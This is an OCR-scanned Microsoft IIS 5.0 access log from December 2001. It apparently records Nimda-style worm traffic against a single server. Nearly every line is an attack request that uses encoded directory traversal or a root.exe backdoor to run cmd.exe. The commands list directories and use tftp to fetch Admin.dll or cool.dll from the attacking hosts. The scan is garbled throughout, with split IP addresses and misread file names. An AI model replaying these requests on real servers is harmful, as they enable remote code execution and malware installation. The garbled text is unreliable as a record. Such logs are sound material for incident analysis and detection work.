/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 72. 72. 166%20GET%20cool . dll%20e : \httpodbc.dll 502 - 
2001-12-13 16:52:42 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/. .%5c. . /httpodbc . dll - 500 - 

2001-12-13 16:52:42 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+dir 200 - 

2001-12-13 16:52:43 217 .72 .72 .166 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+tftp%20- 

i%20217. 72. 72. 166%20GET%20cool.dll%20c: \httpodbc.dll 502 - 

2001-12-13 16:52:45 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+tftp%20- 

i%20217. 72. 72. 166%20GET%20cool.dll%20d: \httpodbc.dll 502 - 

2001-12-13 16:52:46 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+tftp%20- 

i%20217. 72. 72. 166%20GET%20cool . dll%20e : \httpodbc.dll 502 - 

2001-12-13 16:52:47 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 

/_vti_bin/. .%5c. ./. .%5c. ./. .%5c. ./httpodbc. dll - 500 - 

2001-12-13 16:52:49 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 

/_mem_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 16:52:51 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 

/msadc/. . %5c. ./. . %5c. ./. . %5c/ . .A* . ./ . .A* . ./ . .A* . . /winnt/system32/cmd. 

exe /c+dir 403 - 

2001-12-13 16:52:52 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ . .A» .. /winnt/system32/cmd. exe /c+dir 500 - 
2001-12-13 16:52:54 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 
/scripts/winnt/system32/cmd.exe /c+dir 404 - 
2001-12-13 16:52:57 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 
/scripts/ ../.. /winnt/system32/cmd. exe /c+dir 200 - 
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2001-12-13 1 6:52:5 7 21 7.72 . 72.166 - 21 7.57.163.98 80 GET 
/ script s/ . ./. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool . dll%20c : \httpodbc.dll 502 
2001-12-13 16:52:59 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/ script s/ . ./. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 72. 72.166%20GET%20cool.dll%20d: \httpodbc.dll 502 
2001-12-13 16:52:59 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/ script s/ . ./. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool . dll%20e : \httpodbc.dll 502 
2001-12-13 16:52:59 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/ script s/ ../.. /httpodbc.dll - 500 - 

2001-12-13 16:53:00 217 .72 .72 .166 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . . \ . . /winnt/system32/cmd.exe /c+dir 200 - 
2001-12-13 16:53:00 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 
/scripts/ . . \. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool . dll%20c : \httpodbc.dll 502 
2001-12-13 16:53:02 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ . . \. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool .dll%20d: \httpodbc.dll 502 
2001-12-13 16:53:02 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ . . \. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool . dll%20e : \httpodbc.dll 502 
2001-12-13 16:53:03 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ .. \ .. /httpodbc.dll - 500 - 

2001-12-13 16:53:03 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %5c .. /winnt/system32/cmd.Bxe /c+dir 200 - 
2001-12-13 16:53:04 217 .72 .72 .166 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool . dll%20c : \httpodbc.dll 502 
2001-12-13 16:53:04 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool .dll%20d: \httpodbc.dll 502 
2001-12-13 16:53:05 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool . dll%20e : \httpodbc.dll 502 
2001-12-13 16:53:05 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/. .%5c. ./httpodbc.dll - 500 - 

2001-12-13 16:53:05 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd.exs /c+dir 200 - 
2001-12-13 16:53:06 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool .dll%20c : \httpodbc.dll 502 
2001-12-13 16:53:06 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool . dll%20d: \httpodbc.dll 502 
2001-12-13 16:53:08 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool . dll%20e : \httpodbc.dll 502 
2001-12-13 16:53:08 217 .72 .72 . 166 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. ./httpodbc.dll - 500 - 

2001-12-13 16:53:08 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd.exB /c+dir 200 - 
2001-12-13 16:53:09 217 .72.72.166 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool . dll%20c : \httpodbc.dll 502 
2001-12-13 16:53:09 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool . dll%20d: \httpodbc.dll 502 
2001-12-13 16:53:10 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 72. 72 . 166%20GET%20cool . dll%20e : \httpodbc.dll 502 
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2001-12-13 16:53:10 217.72.72.166 - 217.57.163.98 80 GET 
/scripts/. .%5c. . /httpodbc . dll - 500 - 

2001-12-13 16:53:10 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ .. %2f. . /winnt/system32/cmd.exB /c+dir 200 - 
2001-12-13 16:53:12 217 .72.72.166 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exs /c+tftp%20- 
i%20217. 72. 72. 166%20GET%20cool . dll%20c : \httpodbc.dll 502 - 
2001-12-13 16:53:12 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 72. 72. 166%20GET%20cool.dll%20d: \httpodbc.dll 502 - 
2001-12-13 16:53:13 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 72. 72. 166%20GET%20cool . dll%20e : \httpodbc.dll 502 - 
2001-12-13 16:53:13 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ . .%2f. ./httpodbc. dll - 500 - 

2001-12-13 16:56:16 217.57.241.234 - 217 . 57 .163 . 98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 16:58:48 217 .57 .241 .234 - 217 .57 .163 .98 80 GET 
/scripts/root .exe /c+tftp%20- 

i%20217.57.241.234%20GET%20Admin.dll%20Admin.dll 502 - 
2001-12-13 17:01:39 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 
/scripts/root .exe /c+dir 200 - 

2001-12-13 17:01:39 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 
/scripts/root .exe /c+tftp%20- 

i%20217 .57 .113.19%20GET%20Admin.dll%20Admin.dll 502 - 
2001-12-13 17:01:40 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ Admin.dll - 500 - 

2001-12-13 17:01:40 217 . 57 . 113 . 19 - 217 . 57 .163 . 98 80 GET 
/MSADC/root.exe /c+dir 403 - 

2001-12-13 17:01:44 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 
/c/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 17:01:44 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/d/winnt/ 'system32Zcmd.exe /c+dir 404 - 

2001-12-13 17:01:44 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 
2001-12-13 17:01:45 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/sy stem32/cmd.exe /c+tftp%20- 
i%20217 .57 .113. 19%20GET%20Admin.dll%20c: \Admin.dll 502 - 
2001-12-13 17:01:45 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/sy stem32/cmd. exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-13 17:01:46 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/sy stem32/cmd.exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20e: \Admin.dll 502 - 
2001-12-13 17:01:46 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. ./Admin.dll - 500 - 

2001-12-13 17:01:46 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 

/_vti_bin/ . . %5c. . /. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+dir 200 - 

2001-12-13 17:01:46 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/sy stem32/cmd. exe /c+tftp%20- 

i%20217. 57. 113. 19%20GET%20Admin.dll%20c: \Admin.dll 502 - 

2001-12-13 17:01:58 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/ . . %5c. ./• • %5c. ./ . . %5c. . /winnt/sy stem32/cmd. exe /c+tftp%20- 

i%20217. 57. 113. 19%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 17:01:58 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+tftp%20- 

i%20217. 57. 113. 19%20GET%20Admin.dll%20e: \Admin.dll 502 - 

2001-12-13 17:01:59 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/. .%5c. ./. .%5c. ./. .%5c. ./Admin.dll - 500 - 

2001-12-13 17:01:59 217 .57 .113 .19 - 217 .57 .163.98 80 GET 

/_mem_bin/ . . %5c. . / . . %5c. . / . . %5c . . /winnt/ system32Zcmd.exe /c+dir 404 - 
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2001-12-13 17:01:59 217.57.113.19 - 217 .57 .163 .98 80 GET 

/msadc/. . %5c. ./. . %5c. ./. . %5c/ . .A» . ./ . .A» . ./. .A» . . /winnt/system32/cmd. 

exe /c+dlr 403 - 

2001-12-13 17:02:00 217 . 57 . 113 . 19 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .A» . . /winnt/system32/cmd.exe /c+dir 500 - 
2001-12-13 17:02:00 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 
/scripts/winnt/system32/cmd.exe /c+dir 404 - 
2001-12-13 17:02:04 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ ../.. /winnt/system32/cmd .exe /c+dir 200 - 
2001-12-13 17:02:04 217 . 57 . 113 . 19 - 217 . 57 .163 . 98 80 GET 
/scripts/ . ./. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20c: \Admin.dll 502 - 
2001-12-13 17:02:06 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . ./. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-13 17:02:06 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 
/scripts/ . ./• . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20e: \Admin.dll 502 - 
2001-12-13 17:02:07 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ ../. ./Admin.dll - 500 - 

2001-12-13 17:02:07 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ .. \ .. /winnt/system32/cmd. exe /c+dir 200 - 
2001-12-13 17:02:08 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 
/scripts/ . . \. . /winnt/ 'system32Zcmd.exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20c: \Admin.dll 502 - 
2001-12-13 17:02:08 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 
/scripts/ . . \. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-13 17:02:09 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . . \. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20e: \Admin.dll 502 - 
2001-12-13 17:02:13 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .\ .. /Admin.dll - 500 - 

2001-12-13 17:02:13 217 . 57 . 113 . 19 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %5c. . /winnt /system32/cmd. exe /c+dir 200 - 
2001-12-13 17:02:14 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt /system32/cmd. exe /c+tftp%20- 
i%20217 .57 .113. 19%20GET%20Admin. di l%20c: \Admin.dll 502 - 
2001-12-13 17:02:14 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt /system32/cmd. exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-13 17:02:16 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt /system32/cmd. exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20e: \Admin.dll 502 - 
2001-12-13 17:02:16 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. ./Admin.dll - 500 - 

2001-12-13 17:02:16 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %5c. . /winnt /system32/cmd. exe /c+dir 200 - 
2001-12-13 17:02:17 217 . 57 . 113 . 19 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt /system32/cmd. exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20c: \Admin.dll 502 - 
2001-12-13 17:02:17 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt /system32/cmd. exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-13 17:02:18 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/ system32Zcmd.exe /c+tftp%20- 
i%20217 .57 .113. 19%20GET%20Admin .dll%20e: \Admin.dll 502 - 
2001-12-13 17:02:18 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. ./Admin.dll - 500 - 

2001-12-13 17:02:18 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ .. %5c. . /winnt /system32/cmd. exe /c+dir 200 - 
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2001-12-13 17:02:20 217.57.113.19 - 217.57.163.98 80 GET 
/ script s/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20c: \Admin.dll 502 - 
2001-12-13 17:02:20 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/ script s/ . .%5c. . /winnt/system32/cmd.exs /c+tftp%20- 
i%20217 .57 . 113. 19%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-13 17:02:22 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/ script s/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20e: \Admin.dll 502 - 
2001-12-13 17:02:22 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . . %5c. . /Admin.dll - 500 - 

2001-12-13 17:02:22 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %2f. . /winnt/system32/cmd.exs /c+dir 200 - 
2001-12-13 17:02:23 217 . 57 . 113 . 19 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exs /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20c: \Admin.dll 502 - 
2001-12-13 17:02:23 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-13 17:02:27 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20e: \Admin.dll 502 - 
2001-12-13 17:02:31 217 . 57 . 113 . 19 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%2f. ./Admin.dll - 500 - 

2001 -1 2-1 3 1 8:49:39 21 7.57.241 .234 - 21 7.57.1 63.98 80 GET /scripts/root.exe /c+dir 200 - 
2001-12-13 18:49:39 217 . 57 . 241 . 234 - 217 . 57 . 163 . 98 80 GET 
/scripts/root.exe /c+tftp%20- 

i%20217.57.241.234%20GET%20Admin.dll%20Admin.dll 502 - 
2001-12-13 18:49:41 217 . 57 . 241 . 234 - 217 . 57 . 163 . 98 80 GET 
/scripts/ Admin.dll - 500 - 

2001-12-13 18:49:41 217 .57 .241 .234 - 217 .57 .163 .98 80 GET 
/MSADC/root.exe /c+dir 403 - 

2001-12-13 18:49:42 217 .57 .241 .234 - 217 .57 .163 .98 80 GET 
/c/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 18:49:42 217 . 57 . 241 . 234 - 217 . 57 . 163 . 98 80 GET 
/d/winnt/ system32Zcmd.exe /c+dir 404 - 

2001-12-13 18:49:44 217 .57 .241 .234 - 217 .57 .163 .98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 
2001-12-13 18:49:44 217 . 57 . 241 . 234 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/ system32Zcmd.exe /c+tftp%20- 
i%20217 .57 .241. 234%20GET%20Admin . dll%20c : \Admin.dll 502 - 
2001-12-13 18:49:46 217 .57 .241 .234 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt /syst em32/cmd.exe /c+tftp%20- 
i%20217. 57. 241. 234%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-13 18:49:47 217 . 57 . 241 . 234 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt /syst em32/cmd.exe /c+tftp%20- 
i%20217. 57. 241. 234%20GET%20Admin . dll%20e : \Admin.dll 502 - 
2001-12-13 18:49:49 217 .57 .241 .234 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. ./Admin.dll - 500 - 

2001-12-13 18:49:50 217 . 57 . 241 . 234 - 217 . 57 .163 . 98 80 GET 
/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt /syst em32/cmd. exe /c+dir 200 - 
2001-12-13 18:49:52 217 .57 .241 .234 - 217 . 57 .163 . 98 80 GET 
/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt /syst em32/cmd. exe /c+tftp%20- 
i%20217. 57. 241. 234%20GET%20Admin.dll%20c: \Admin.dll 502 - 
2001-12-13 18:49:54 217 . 57 . 241 . 234 - 217 . 57 . 163 . 98 80 GET 
/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt /syst em32/cmd. exe /c+tftp%20- 
i%20217. 57. 241. 234%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-13 18:49:55 217 . 57 . 241 . 234 - 217 . 57 . 163 . 98 80 GET 
/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt /syst em32/cmd. exe /c+tftp%20- 
i%20217. 57. 241. 234%20GET%20Admin . dll%20e : \Admin.dll 502 - 
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2001-12-13 18:49:58 217.57.241.234 - 217 .57 .163 .98 80 GET 

/_vti_bin/. .%5c. ./. .%5c. ./. .%5c. ./Admin.dll - 500 - 

2001-12-13 18:49:59 217 .57 .241 .234 - 217 .57 .163 .98 80 GET 

/_mem_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd.exe /c+dir 404 - 

2001-12-13 18:50:01 217 . 57 . 241 . 234 - 217 . 57 .163 . 98 80 GET 

/msadc/. .%5c. ./. .%5c. ./. .%5c/. .A*. ./. .A*. ./. .A*. . /w±nnt/system32/cmd. 

exe /c+dir 403 - 

2001-12-13 18:50:02 217 .57 .241 .234 - 217 .57 .163 .98 80 GET 
/scripts/ . .A» . . /winnt/system32/cmd.exe /c+dir 500 - 
2001-12-13 18:50:04 217 .57 .241 .234 - 217 . 57 .163 . 98 80 GET 
/scripts/winnt/system32/cmd.exe /c+dir 404 - 
2001-12-13 18:50:06 217 .57 .241 .234 - 217 .57 .163 .98 80 GET 
/scripts/ ../.. /winnt/system32/cmd. exe /c+dir 200 - 
2001-12-13 18:51:15 217 .57 .241 .234 - 217 .57 .163 .98 80 GET 
/scripts/ . ./. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 241. 234%20GET%20Admin . dll%20c : \Admin.dll 502 - 
2001-12-13 19:00:32 217 .113 .1 .248 - 217 .57 .163 .98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 19:02:05 217 .113 .1 .248 - 217 . 57 .163 . 98 80 GET 
/MSADC/root . exe /c+dir 403 - 

2001-12-13 19:02:07 217 .113 .1 .248 - 217 . 57 .163 . 98 80 GET 
/c/winnt/system32/cmd.exe /c+dir 404 - 

2001-12-13 19:02:09 217 .113 .1 .248 - 217 . 57 .163 . 98 80 GET 
/d/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 19:02:13 217 .113 .1 .248 - 217 .57 .163 .98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 
2001-12-13 19:06:13 217 .113 .1 .248 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 113. 1.248%20GET%20cool.dll%20c: \httpodbc.dll 502 - 
2001-12-13 19:06:14 217 .113 .1 .248 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 113. 1.248%20GET%20cool.dll%20d: \httpodbc.dll 502 - 
2001-12-13 19:06:18 217 .113 .1 .248 - 217 .57 .163 .98 80 GET 
/scripts/root .exe /c+tftp%20- 

i%20217 .113.1. 248%20GET%20cool.dll%20httpodbc.dll 502 - 
2001-12-13 19:32:50 217 . 57 . 241 . 234 - 217 . 57 . 163 . 98 80 GET 
/scripts/root .exe /c+dir 200 - 

2001-12-13 19:34:03 217 .57 .241 .234 - 217 .57 .163 .98 80 GET 
/scripts/root .exe /c+tftp%20- 

i%20217 .57 .241.234%20GET%20Admin.dll%20Admin.dll 502 - 

^Software : Microsoft Internet Information Services 5.0 
#Version: 1.0 

#Date: 2001-12-12 21:44:30 

#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem 
cs-uri-query sc-status cs (User-Agent) 

2001-12-12 21:46:42 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/scripts/root .exe /c+dir 404 - 

2001-12-12 21:46:50 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/MSADC/root .exe /c+dir 403 - 

2001-12-12 21:46:55 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/c/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-12 21:47:00 217 . 57 . 79 . 187 - 217 . 57 .163 . 98 80 GET 
/d/winnt/ system32Zcmd.exe /c+dir 404 - 

2001-12-12 21:47:05 217 .57 .79 .187 - 217 .57 .163 .98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 
2001-12-12 21:49:32 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/sy stem32/cmd.exe /c+tftp%20- 
i%20217 .57 .7 9.187 %20GET%20Admin.dll%20d: \Admin.dll 502 - 
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2001-12-12 21:49:51 217.57.79.187 - 217.57.163.98 80 GET 

/ script s/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 

i%20217. 57. 79. 187%20GET%20Admin . dll%20c : \Admin.dll 502 - 

2001-12-12 21:51:13 217 . 57 . 79 . 187 - 217 .57 .163 .98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/ system32/cmd. exe /c+dir 200 - 

2001-12-12 21:51:26 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+tftp%20- 

i%20217. 57. 79. 187%20GET%20Admin . dll%20c : \Admin.dll 502 - 

2001-12-12 21:51:35 217 . 57 . 79 . 187 - 217 .57 .163 .98 80 GET 

/ script s/ . .%5c. . /winnt /system32/cmd. exe /c+tftp%20- 

i%20217. 57. 79. 187%20GET%20Admin . dll%20e : \Admin.dll 502 - 

2001-12-12 21:53:02 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt /system32/cmd. exe /c+tftp%20- 

i%20217. 57. 79. 187%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-12 21:53:13 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt /system32/ cmd. exe /c+tftp%20- 

i%20217. 57. 79. 187%20GET%20Admin . dll%20e : \Admin.dll 502 - 

2001-12-12 21:53:41 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 

/_vti_bin/. .%5c. ./. .%5c. ./. .%5c. ./Admin.dll - 500 - 

2001-12-12 22:20:06 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 

/ script s/root .exe /c+dir 404 - 

2001-12-12 22:20:06 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/MSADC/root.exe /c+dir 403 - 

2001-12-12 22:20:08 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/c/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-12 22:20:08 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/d/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-12 22:20:09 217 .82.33.74 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . . %5c. . /winnt /system32/ cmd. exe /c+dir 200 - 
2001-12-12 22:20:56 217 .82.33.74 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt /system32 /cmd. exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin . dll%20c : \Admin.dll 502 - 
2001-12-12 22:21:41 217 .82.33.74 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/ system32Zcmd.exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-12 22:21:42 217 .82.33.74 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt /system32/ cmd. exe /c+tftp%20- 
i%20217. 82. 33. 74%20GET%20Admin. dll%20e : \Admin.dll 502 - 
